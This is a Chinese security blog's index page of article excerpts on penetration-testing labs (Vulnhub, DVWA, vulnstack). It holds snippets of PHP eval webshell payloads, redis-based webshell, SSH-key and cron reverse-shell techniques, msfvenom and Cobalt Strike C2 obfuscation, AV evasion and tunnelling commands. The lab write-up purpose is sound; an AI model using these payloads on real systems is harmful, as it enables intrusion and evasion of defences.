自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

干铮的博客

热爱技术的一个小帅哥。

  • 博客(149)
  • 资源 (1)
  • 收藏
  • 关注

原创 网站安全狗V4.0绕过姿势

网站安全狗下载地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.htmlDVWA下载:链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ提取码:kun6--来自百度网盘超级会员V3的分享已DVWA SQL注入为例对网站安全狗进行绕过测试。1.查看安全狗防御规则匹配库。2.绕过分析 字符 ...

2021-09-27 14:49:11 3787 4

原创 通达OA11.6身份验证绕过+文件上传

环境安装11.6OA链接:https://pan.baidu.com/s/1tmqpaq5NnY3edshJExxqQg 提取码:z33a 源码解密工具链接:https://pan.baidu.com/s/1LbdVhaVInbMxQoAM4g4VKg 提取码:nrtw漏洞利用import requeststarget="http://192.168.202.151"payload="<?php @eval($_REQUEST[777])?>"p...

2021-08-03 13:41:18 1131

原创 vulnstack(五)

1.信息收集主机发现sudo netdiscover eth0 -r 192.168.31.0/24端口扫描nmap -A 192.168.31.57 -p- -sV -oN nmap.agoby漏扫2.漏洞利用goby 通用poc写webshellecho ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义type shell.php蚁剑连接webshell3.

2021-05-30 11:50:00 1108 5

原创 Vulnstack(四)

靶场拓扑下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/用的是VMware workstation 所以可能出现一些错误Docker环境启动的是Vulhub的在线三个靶机1.信息收集主机发现sudo netdiscover -i eth1 -r 192.168.157.0/24端口扫描nmap -A 192.168.53.128 -p- -oN nmap.a2.apacheput文件上传脚本..

2021-05-24 16:35:35 1003 3

原创 网站CDN 判断 绕过方法

CDN判断目标是否存在CDN服务利用多节点技术进行i请求返回判断。1.多地PING/超级PING http://ping.chinaz.com/CDN对安全测试的影响CDN绕过方式1.子域名查询通过解析网站子域名的IP地址查,查看是否存在没有经过CDN节点流量的子域名。典型的案例就是访问www.xueersi.com和xueersi.com使用多地PING来检测这个站点就会很容易发现网站真实的IP地址,在多地PING访问xueersi.com的时候看到所有返回都是相同IP

2021-04-10 15:47:47 504 1

原创 frp内网穿透

frp内网穿透frp是一种快速反向代理,可以帮助将NAT或防火墙后面得本地服务公开到Internet。目前为止,它支持UDP和TCP以及HTTP和HTTPS协议,在这些协议中,请求可以通过域名转发到内部服务,frp还具有P2P链接模式。工具下载地址:https://github.com/fatedier/frpfrp的作用利用处于内网或防火墙后的机器,对外网环境提供http或https服务。对于http,https服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名公用一个80端口。利

2021-03-26 16:23:34 459

原创 内网渗透 SSH隧道

SSH隧道 SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据。但是,SSH还能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了响应的解密服务。这一过程也被叫做“隧道”(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名,例如SMTP、LDAP这些TCP应用均能够从中得益,避免了用户名,密码以及隐私信息的传输。而此同时,如果工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH的连接,也能够通过将TCP端口转发来使用SSH进行通讯..

2021-03-24 18:38:58 618

原创 内网穿透Neo-reGeorg

内网穿透Neo-reGeorgreGeorg是一个基于http协议的内网穿透神器,也就是我们在获得服务器的webshell后可以通过上传生成好的key.txt来建立sock5连接,通过sock5连接更好的对内网进行横向渗透。github项目地址,https://github.com/L-codes/Neo-reGeorg生成服务端python3 neoreg.py generate -k 123456 上传tunnel.php进行连接服务器是phpstudy搭建的.

2021-03-23 21:11:33 772

原创 Metasploit Portfwd(端口转发/重定向)

Metasploit Portfwd端口抓发获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。先获取目标主机的shell建立连接使用enable_rdp模块开启目标的远程连接run post/windows/manage/enable_rdpportfwd add -l 3389 -p 3389 -r 192.168.28.131rdesktop 127.0.0.1:3389...

2021-03-23 17:40:30 913

原创 cobalt strike正向反向连接内网

使用Cobalt strike正向连接多层内网使用Cobalt strike正向连接多层内网win10服务器以上线到cs上,利用win10作为跳板机正向连接2008web服务器生成监听器beacon-tcpweb服务器执行becone.exeinteract 进入beacon连接目标connect 10.10.1.129 7666输入命令正向连接使用Cobalt strike反向连接多层内网通过服务器方向连接teamserver,因为是服务器主动连接

2021-03-22 20:25:38 3215

原创 netsh端口映射与端口转发

1.netsh端口映射netsh是windows系统自带的一个命令行工具,这个工具可以内置端口转发功能实验场景web服务器的80端口转发到win10的7777端口上,kali通过访问win10的7777端口进行访问没问你web服务器。netsh interface portproxy add v4tov4 listenport=win10设置的端口 connectaddress= web服务 器(ip) connectport=端口netsh interface portp

2021-03-22 15:51:39 781 4

原创 cobalt strike生成证书修改C2 profile流量加密混淆

C2 profile流量加密混淆生成证书修改C2 profile加密混淆实际上就是对流量加密传输,目的是为了逃逸安全审计,穿透检测器。生成免费的ssl证书在运行cobalt strike 默认使用的cobaltstrike store证书,生成新证书的意义是将使用我们现在的制定好的证书。默认的证书cobalt strike会被检测。keytool -genkey -alias wkk -keyalg RSA -validity 36500 -keystore wkk.storewk

2021-03-15 18:35:47 3743

原创 域前置技术

域前置(Domain Fronting)基于HTTPS通用规避技术,也被称为域前端网络攻击,这是一种用来隐藏Metasploit,Cobalt Strike 等团队控制服务器流量以此来一定程度绕过检查器或防火墙检测的技术,如 Amazon ,Google,Akamai 等大型厂商会提供一些域前端技术服务。域前置技术原理通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。利用我们配置域名的高可信度,我们可以设置一个微软或者谷歌的子域名,可以有效的..

2021-03-15 16:35:26 5366

原创 MSF流量加密躲避检测

为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具,专门用来分析流量特征,分析网络流量特征,分析网络流量,如后门特征,行为特征、像metasploit在内网做横向渗透时。这些流量很容易就被检测出来,所以做好流量加密,就能避免审计工具检测出来。...

2021-03-15 12:03:06 1179

原创 Openssl反弹加密shell

使用Openssl反弹加密shell进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。...

2021-03-14 22:02:19 863

原创 python Re模块正则表达式

正则表达式,是一些由字符和特殊符号组成的字符串,它们能按照某种模式匹配一系列有相似特征的字符串。示例.匹配任意字符[]单个字符逐一匹配.\d匹配单个0-9\w匹配0-9a-zA-Z_该范围内的单个字符\s匹配空白字符以及空格一组字符匹配逐字匹配逐字匹配 |分割不同的字符*表示左邻第一个字符出现0次到无穷次+表示左邻第一个字符出现一次到无穷次?表示左邻第一个字符出现0次或1次{}指定左邻字符出现的次...

2021-03-11 23:17:29 115

原创 域渗透综合项目实战

1.项目网络拓扑2.信息收集netdiscover主机发现sudo netdiscover -i eth0 -r 192.168.3.0/24Nmap端口扫描nmap -A 192.168.3.45 -p- -oN nmap.a

2021-02-27 00:57:25 3911 4

原创 linux提权辅助脚本整合

1. LinEnum的使用这个脚本是用来收集系统的信息,如:特殊文件的权限、suid文件信息、网络端口信息。sudo python -m SimpleHTTPServer 80下载文件执行 wget http://192.168.0.109/LinEnum.sh历史记录找到 root 密码yanisy1232. linux-exploit-suggester的使用这个用来检测是否存在提权cve漏洞下载文件执行 wget https://raw.githubuserco.

2021-02-20 23:41:13 1889

原创 综合渗透测试实战项目

1.项目网络拓扑1.信息收集netdiscover进行主机发现sudo netdiscover -i eth0 -r 192.168.3.0/24端口服务探测这里使用两款工具一款是nmapnmap -A 192.168.3.134 -p- -oN nmap.akali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.aStarting Nmap 7.80 ( https://n

2021-02-07 20:06:51 6117 1

原创 redis写webshell

利用redis写webshellkali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28192.168.3.28:6379> config set dir /usr/local/nginx/htmlOK192.168.3.28:6379> config set dbfilename shell.phpOK192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g

2021-01-31 19:30:05 756

原创 redis 密钥登陆ssh

redis密钥登陆ssh1.生成密钥ssh-keygen -t rsa2.防止乱码导入到key文件中(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txtcat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx--pass是登录密码 无密码可不填redis-cli -h 192.168.3.26 config set dir /ro

2021-01-31 14:50:03 1685

原创 redis计划任务反弹shell

1.环境搭建Ubuntu16.04安装redissudo apt-get install redis-servervim /etc/redis/redis.conf注释掉密码和仅允许本地访问kali 安装redis-cli进行连接wget http://download.redis.io/redis-stable.tar.gztar -zxvf redis-stable.tar.gzcd redis-stable make //全局生效 cp src/redis

2021-01-31 12:35:36 2635

原创 解决反弹shell方向键编码错误问题(小技巧)

1.接收一个反弹shell并设置为交互式shellnc -lvnp 7777python -c "import pty;pty.spawn('/bin/bash')"2.更改编码格式为rwa先ctrl+z暂停进程输入命令ctrl + z 暂停进程stty -echo raw 改编码格式fg 切换回原来进程...

2021-01-29 23:06:02 776

原创 Weblogic SSRF 到Getshell

Weblogic SSRF漏洞描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,进而攻击内网redis/fastcgi等脆弱组件。1.环境搭建环境采用vulhub的docker环境启动环境路径vulhub/weblogic/ssrf启动环境命令docker-compose builddocker-compose up -d访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用2.S..

2021-01-29 22:53:25 542

原创 python文件&异常处理

1.文件处理文件就像一个仓库一样可以存储各式各样的数据类型供我们使用,根据文件的用途可以分为,数据库文件、图像文件、音频、视频、文本文件等。本节主要以文本文件的处理操作为例,。文本文件中存储的是常规字符串,由文本行组成,每行结尾通常由换行符“m”结尾。对于文本文件来说,通常的操作流程为;(1)打开文件创建对象;(2)对该文件内容进行读取、写入、删除。修改等操作;(3)关闭并保存文件2.创建文件对在python中内置了文件对象,通过open()函数就可以指定模式打开指定文件并创建文

2021-01-12 14:51:20 665

原创 python序列&&控制结构

列表在python中,序列是最基本的数据结构,其就相当于c语言中的数组结构,python中序列结构包括列表、元祖、字典等列表是python序列重要的组成之一,在列表中的所有元素都放在一对中括号“ [ ] ”内,相邻元素之间使用逗号隔开,例如;['wkk','成员组成'](1)创建列表>>>student = ['number','name','age']运行结果:['numbet', 'name', 'age']也可以通过list()函数将元祖、字符串、字典或者其他

2021-01-11 20:27:31 253 1

原创 linux计划任务

1.一次性计划任务at命令systemctl status atd[root@localhost ~]# at 9:18at> mkdir -p /tmp/123dirat> <EOT>job 1 at Fri Nov 27 09:18:00 2020[root@localhost ~]# at -l1 Fri Nov 27 09:18:00 2020 a root[root@localhost ~]# at now +5 hourat&g

2020-11-29 20:16:38 442

原创 基于三层交换端口聚合技术

1.网络拓扑2.操作过程交换机之间配置trunk链路。 交换机间配置VTP域实现交换机间vlan表互相学习方便配置与管理。 创建vlan10 vlan20区域。 交换机与终端间配置接口链路并划分到相应的虚拟局域网内。 三层交换机为vlan虚拟子网配置网关。 交换机开启三层路由功能。 实现VLAN间互相通信。 将新增线路配置为trunk链路。 创建聚合端口。 将聚合端口配置为trunk模式。 将需要配置端口聚合的trunk链路,加入聚合端口。 配置端口聚合链路IP负载均衡

2020-11-23 20:44:18 3065

原创 入侵靶机DC-9

1.主机发现Nmap -sP 192.168.43.0/24C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.79Host is up (0.0010s latency).MAC Address: 00:0C:29:B7:B6:AD (VMware).

2020-11-11 22:16:09 479

原创 靶机【Vulnhub】FourAndSix2

FourAndSix21.主机发现靶机给出了网卡ip和网关还是Nmap ping扫一下C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-19 10:48 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.1Host is up (0.0070s latency).MAC Address: EC:D0:9F

2020-10-19 22:39:59 553

原创 drupla SQL手工注入复习

判断列数?nid=1 order by 1 --+` ?nid=1 order by 1 --+ 错误程序中SQL语句有两列判断显示位?nid=0 union select 1`数据库名字?nid=0 union select database()数据库版本?nid=0 union select version()列表名?nid=0 union select table_name from information_schema.

2020-10-15 20:33:38 140

原创 入侵靶机DC-8

DC-81.主机发现使用Nmap进行ping扫描,根据已知mac地址获取ip地址。Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.1Host is up (0.0049s latency).MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi

2020-10-15 20:20:56 1979

原创 Payload分离免杀绕过杀软

Payload分离免杀绕过杀软杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。1.C语言编译后门root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \> -p windows/meterpreter/reverse_tcp \> -b '\x00\x0b' LHOST=123.56.138

2020-10-14 22:14:20 2954 12

原创 MSF生成后门汇总

可执行脚本反弹shell1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe监听设置:msfconsoleuse exploit/mul...

2020-10-10 21:28:08 4625 3

原创 Vulnhub 靶机 Billu_b0x

1.主机发现ping扫描Nmap -sP 192.168.43.0/24端口扫描Nmap 192.168.43.217 -A -p- -oN nmap.AC:\Users\ASUS>Nmap 192.168.43.217 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-09 14:29 ?D1ú±ê×?ê±??Nmap scan report for indishell (192.

2020-10-10 11:49:02 877

原创 入侵靶机DC-7

DC-71.主机发现靶机开机后DHCP获取有ip地址2.信息收集端口扫描C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±??Nmap scan report for dc-7 (192.168.43.111)Host is up (0.00030s latency).Not s

2020-10-08 21:52:17 1437

原创 入侵靶机DC-6

DC-61.主机发现2.端口扫描C:\Users\ASUS>Nmap 192.168.43.182 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 10:16 ?D1ú±ê×?ê±??Nmap scan report for dc-6 (192.168.43.182)Host is up (0.00022s latency).Not shown: 65533 closed p

2020-10-05 21:40:03 1226

原创 入侵靶机DC-5

1.主机扫描通过已知MAC地址,确定DC-5的ip。2.端口扫描确定靶机开放端口3.访问web界面提交表单发现时间在变化直接访问thankyou.php文件这里可能存在文件包含4.web目录扫描...

2020-10-04 19:16:49 363

原创 靶机【B2R】Dina-1-0-1

【B2R】Dina-1-0-11.信息收集根据靶机MAC地址获取IP。Nmap -sP 192.168.43.0/24Nmap 192.168.43.91 -A -p- -oN nmap.A2.网页信息收集访问站点御剑扫描敏感目录敏感目录http://192.168.43.91/nothing/后台备份文件解压文件尝试使用之前留给的密码freedom使用文本打开文件访问http://192.168.43.

2020-09-27 12:35:09 390 1

原创 靶机【B2R】Bob:1.0.1

Bob:1.0.1下载链接https://download.vulnhub.com/bob/Bob_v1.0.1.ova将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。1.信息收集根据已知靶机mac地址查询ip。确定目标IPNmap -sP 192.168.43.0/24端口扫描Nmap 192.168.43.169 -A -p- -oN namp.AC:\Users\ASUS>Nmap 192.168.43.169 -A -p-

2020-09-26 11:42:47 1007

c7200-is-mz.123-14.T1.image

GNS3 ISO路由器镜像文件,用于组网练习使用。 GNS3是一款模拟CISCO网络设备的模拟器,和CPT(Cisco Packet Tracer)相比。GNS3运行的是真实设备的IOS,命令集更全,在如有部分有非常好的表现,交换部分虽有欠缺(现网中交换部分主要使用硬件功能,再转发数据的时候使用的是芯片),但基本功能可以使用。

2020-03-03

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除